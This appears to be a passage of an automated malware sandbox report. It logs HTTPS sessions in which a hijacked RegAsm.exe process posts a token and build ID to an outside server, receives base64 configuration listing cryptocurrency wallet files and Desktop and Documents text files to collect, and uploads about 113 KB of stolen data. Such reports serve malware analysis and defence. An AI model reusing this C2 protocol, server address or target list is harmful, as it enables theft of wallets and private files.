                                                                                                                                                                                                                                                                                                2024-04-19 15:08:28 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                19192.168.2.44975437.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:29 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HIJEGIIJDGHDGCBGHCAACont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:30 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:30 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                20192.168.2.44975537.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:31 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:31 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BAKFCBFHJDHJKECAKEHICont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:32 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                21192.168.2.44975637.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC264OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 113433
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HCFIJKKKKKFCAAAAFBKFCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC16355OUTData Raw: 43 66 59 6b 44 36 66 53 71 66 6a 66 38 41 35 47 32 37 2f 77 42 32 50 2f 30 42 61 31 50 43 2f 67 48 56 74 46 38 52 32 6d 6f 33 56 78 5a 76 46 44 76 33 43 4e 33 4c 63 6f 56 47 4d 71 50 55 64 36 79 2f 47 2f 38 41 79 4e 74 35 39 49 2f 2f 41 45 42 61 35 61 4c 70 53 78 79 64 4a 33 56 6e 39 2b 70 70 6a 46 56 6a 6c 7a 56 56 57 66 4d 76 75 30 4f 65 70 4b 57 69 76 61 50 6d 68 4b 4b 57 6b 70 67 61 76 68 48 2f 41 4a 48 76 52 2f 38 41 74 74 2f 36 4b 61 76 54 66 45 74 76 71 74 31 70 79 51 36 55 51 47 61 54 39 38 50 4e 4d 5a 5a 4d 48 67 4d 42 6b 63 34 7a 6a 42 78 6e 42 46 65 5a 2b 45 76 2b 52 38 30 66 2f 74 74 2f 36 4b 61 76 55 76 45 56 33 50 59 65 47 4e 57 76 4c 5a 39 6b 39 76 5a 7a 53 78 4e 67 48 61 79 6f 53 44 67 38 48 6b 56 38 56 6d 55 65 62 47 56 6c 35 72 2f 30 6d
                                                                                                                                                                                                                                                                                                Data Ascii: CfYkD6fSqfjf8A5G27/wB2P/0Ba1PC/gHVtF8R2mo3VxZvFDv3CN3LcoVGMqPUd6y/G/8AyNt59I//AEBa5aLpSxydJ3Vn9+ppjFVjlzVVWfMvu0OepKWivaPmhKKWkpgavhH/AJHvR/8Att/6KavTfEtvqt1pyQ6UQGaT98PNMZZMHgMBkc4zjBxnBFeZ+Ev+R80f/tt/6KavUvEV3PYeGNWvLZ9k9vZzSxNgHayoSDg8HkV8VmUebGVl5r/0m
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC16355OUTData Raw: 5a 56 4a 2b 78 50 50 46 49 78 4b 35 35 32 68 67 70 49 2f 75 6e 48 70 56 63 51 61 6f 4a 72 69 51 33 56 70 49 74 77 73 53 76 44 4e 5a 51 79 52 41 52 67 68 41 71 4d 68 56 41 41 7a 59 43 67 64 54 56 61 54 51 35 5a 7a 64 69 34 75 32 6d 57 39 6c 53 61 36 38 77 42 6a 49 36 62 74 70 79 52 6e 6a 63 33 35 31 35 6e 31 4c 47 4f 39 6e 62 56 64 65 6d 68 37 4c 7a 4c 4c 2b 71 76 70 32 36 39 2f 30 4c 4d 31 78 64 61 62 59 77 33 46 33 5a 78 2f 62 4c 4c 54 5a 70 33 67 5a 52 69 53 55 58 68 68 44 50 38 41 33 6c 41 59 48 30 4f 42 32 71 54 37 52 64 58 56 31 70 39 76 4b 64 4b 6c 4f 73 57 68 53 31 75 4c 53 49 51 68 4a 67 35 32 62 68 73 58 42 33 67 6f 63 44 42 42 37 34 71 4a 72 54 55 48 76 4c 53 35 62 55 6e 5a 37 4f 44 37 4c 62 37 6c 55 67 51 6e 4f 59 32 47 4d 4f 76 4f 4d 4e 6b 59
                                                                                                                                                                                                                                                                                                Data Ascii: ZVJ+xPPFIxK552hgpI/unHpVcQaoJriQ3VpItwsSvDNZQyRARghAqMhVAAzYCgdTVaTQ5Zzdi4u2mW9lSa68wBjI6btpyRnjc3515n1LGO9nbVdemh7LzLL+qvp269/0LM1xdabYw3F3Zx/bLLTZp3gZRiSUXhhDP8A3lAYH0OB2qT7RdXV1p9vKdKlOsWhS1uLSIQhJg52bhsXB3gocDBB74qJrTUHvLS5bUnZ7OD7Lb7lUgQnOY2GMOvOMNkY
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC16355OUTData Raw: 50 65 75 64 2b 49 58 2f 41 43 4d 55 50 2f 58 6f 6e 2f 6f 62 31 36 6d 56 2f 77 43 39 52 2b 66 35 4d 57 61 51 6c 48 41 31 4f 62 2b 37 33 37 72 75 33 2f 58 63 35 53 69 69 69 76 72 54 34 67 4b 4b 4b 4b 41 43 69 69 69 67 41 70 44 53 30 55 77 45 6f 6f 37 30 55 41 46 46 46 46 41 43 55 55 70 70 4b 42 68 52 52 52 51 41 6c 46 4c 52 51 4d 53 69 69 69 67 42 4b 4b 4b 4b 41 43 69 69 69 67 42 44 52 53 30 68 6f 47 46 46 46 46 41 42 52 52 52 51 4d 53 69 6c 70 4b 41 43 6b 4e 4c 52 51 4e 43 55 55 55 55 78 68 53 55 74 42 70 41 4a 53 47 6c 6f 6f 41 53 69 69 69 6d 41 55 55 64 71 53 6d 4d 4b 4b 4b 4b 41 45 6f 6f 6f 70 67 42 70 4b 4b 4b 42 68 52 52 52 51 41 6c 46 4c 53 55 41 46 46 46 42 6f 47 46 46 49 4b 44 54 41 4b 4b 4b 4b 41 43 6b 70 61 51 30 44 43 69 69 69 67 41 70 4b 4b 44
                                                                                                                                                                                                                                                                                                Data Ascii: Peud+IX/ACMUP/Xon/ob16mV/wC9R+f5MWaQlHA1Ob+737ru3/Xc5SiiivrT4gKKKKACiiigApDS0UwEoo70UAFFFFACUUppKBhRRRQAlFLRQMSiiigBKKKKACiiigBDRS0hoGFFFFABRRRQMSilpKACkNLRQNCUUUUxhSUtBpAJSGlooASiiimAUUdqSmMKKKKAEooopgBpKKKBhRRRQAlFLSUAFFFBoGFFIKDTAKKKKACkpaQ0DCiiigApKKD
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC16355OUTData Raw: 70 44 51 46 78 4b 4d 55 74 4c 51 41 6c 4a 53 30 55 78 69 55 6c 4f 78 53 64 61 41 45 6f 6f 6f 78 54 41 4b 4d 55 74 4a 51 4d 53 69 69 69 67 42 4d 55 55 74 4a 54 47 47 4b 4d 55 59 6f 78 51 41 6c 4a 69 6e 59 6f 78 54 47 4a 69 69 6c 78 52 69 67 51 41 63 31 76 58 33 2f 48 30 66 38 41 64 58 2b 51 72 43 55 63 69 74 36 2f 34 75 6a 2f 41 4c 71 2f 79 72 6e 71 2f 47 67 54 39 35 46 58 46 46 4c 52 51 62 43 55 6d 4b 64 53 55 44 43 69 69 69 67 42 4b 4b 4d 55 55 78 68 52 2b 46 4b 42 52 51 41 6d 61 53 6e 55 6d 4b 51 42 69 6a 48 46 4f 46 4e 4e 41 45 64 78 2f 77 41 65 64 78 2f 31 7a 2f 71 4b 7a 39 4d 2f 31 37 2f 37 6c 61 46 7a 6b 57 56 78 2f 75 66 31 46 5a 2b 6d 66 36 39 2f 39 79 6e 48 34 57 43 4e 53 6c 6f 78 51 42 53 41 4d 55 6c 4f 78 52 69 6b 4b 34 33 46 4c 69 6e 41 55 75
                                                                                                                                                                                                                                                                                                Data Ascii: pDQFxKMUtLQAlJS0UxiUlOxSdaAEoooxTAKMUtJQMSiiigBMUUtJTGGKMUYoxQAlJinYoxTGJiilxRigQAc1vX3/H0f8AdX+QrCUcit6/4uj/ALq/yrnq/GgT95FXFFLRQbCUmKdSUDCiiigBKKMUUxhR+FKBRQAmaSnUmKQBijHFOFNNAEdx/wAedx/1z/qKz9M/17/7laFzkWVx/uf1FZ+mf69/9ynH4WCNSloxQBSAMUlOxRikK43FLinAUu
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC16355OUTData Raw: 54 54 6a 74 2b 6d 70 31 30 36 47 63 7a 69 70 4b 65 2f 6d 64 46 2f 77 6c 2f 69 44 2f 6f 4a 4e 2f 33 35 6a 2f 38 41 69 61 7a 62 2f 55 4c 76 55 37 67 58 46 37 4f 5a 70 51 67 51 4d 56 56 66 6c 42 4a 78 77 41 4f 35 72 4d 30 33 56 4e 4f 31 49 36 64 64 4a 39 73 68 73 70 32 75 55 75 45 63 71 30 6b 54 51 78 47 58 35 57 32 67 4d 43 76 2b 79 4d 59 49 39 44 53 51 58 49 6b 75 7a 62 53 4f 78 49 31 43 78 74 56 6b 68 78 74 6b 69 75 43 32 4a 46 79 44 6b 46 51 43 50 72 57 6b 4b 2b 42 70 79 35 6f 71 7a 58 36 36 47 64 58 43 5a 72 57 68 79 54 6c 65 4c 38 39 4e 4e 66 36 38 79 33 52 54 47 6b 66 37 54 35 62 36 5a 71 57 6e 6b 5a 2b 53 2f 48 7a 4f 41 65 47 48 37 74 4f 50 7a 70 39 65 6e 53 71 78 71 77 55 34 37 4d 38 50 45 55 4a 30 4b 6a 70 7a 33 51 55 55 55 56 6f 59 68 53 47 6c 70
                                                                                                                                                                                                                                                                                                Data Ascii: TTjt+mp106GczipKe/mdF/wl/iD/oJN/35j/8Aiazb/ULvU7gXF7OZpQgQMVVflBJxwAO5rM03VNO1I6ddJ9shsp2uUuEcq0kTQxGX5W2gMCv+yMYI9DSQXIkuzbSOxI1CxtVkhxtkiuC2JFyDkFQCPrWkK+Bpy5oqzX66GdXCZrWhyTleL89NNf68y3RTGkf7T5b6ZqWnkZ+S/HzOAeGH7tOPzp9enSqxqwU47M8PEUJ0Kjpz3QUUUVoYhSGlp
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:33 UTC15303OUTData Raw: 41 6f 37 30 74 4a 30 6f 47 4a 52 52 30 6f 7a 51 4d 51 30 6c 4c 6d 6b 50 2f 36 71 42 68 53 55 65 39 42 36 30 44 44 74 53 64 61 44 52 33 36 30 41 48 2b 65 74 4a 6e 2f 41 43 61 44 52 51 55 4a 51 66 79 6f 37 55 44 74 51 41 5a 36 35 70 43 66 71 61 4d 38 30 5a 6f 47 4a 6a 48 65 69 6c 2f 58 33 78 53 43 67 59 6e 65 67 30 41 30 55 41 42 36 30 6d 61 42 31 6f 50 53 67 5a 36 48 53 30 67 42 62 66 74 56 32 32 49 5a 48 32 71 54 74 55 64 57 4f 4f 67 39 36 51 4e 6d 50 7a 46 56 32 6a 47 63 75 71 45 71 4d 59 7a 7a 30 34 79 50 7a 46 5a 4f 63 56 75 7a 35 52 55 35 79 32 54 4c 4e 70 64 7a 32 4e 77 73 39 76 49 55 6b 58 75 4f 34 39 44 37 56 74 61 7a 72 30 65 72 61 4c 46 47 55 32 58 4b 7a 41 75 6e 59 6a 61 33 49 4e 63 34 72 62 6a 45 46 56 79 5a 76 39 55 41 68 2f 65 63 34 2b 58 31
                                                                                                                                                                                                                                                                                                Data Ascii: Ao70tJ0oGJRR0ozQMQ0lLmkP/6qBhSUe9B60DDtSdaDR360AH+etJn/ACaDRQUJQfyo7UDtQAZ65pCfqaM80ZoGJjHeil/X3xSCgYneg0A0UAB60maB1oPSgZ6HS0gBbftV22IZH2qTtUdWOOg96QNmPzFV2jGcuqEqMYzz04yPzFZOcVuz5RU5y2TLNpdz2Nws9vIUkXuO49D7Vtazr0eraLFGU2XKzAunYja3INc4rbjEFVyZv9UAh/ec4+X1
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:34 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                22192.168.2.44975737.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:35 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKF
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:35 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BKFIJJEGHDAEBGCAKJKFCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:36 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                23192.168.2.44975837.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:36 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HDBGDHDAECBGDHJKFIDGCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:37 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x3c0000
                                                                                                                                                                                                                                                                                                File size:402'432 bytes
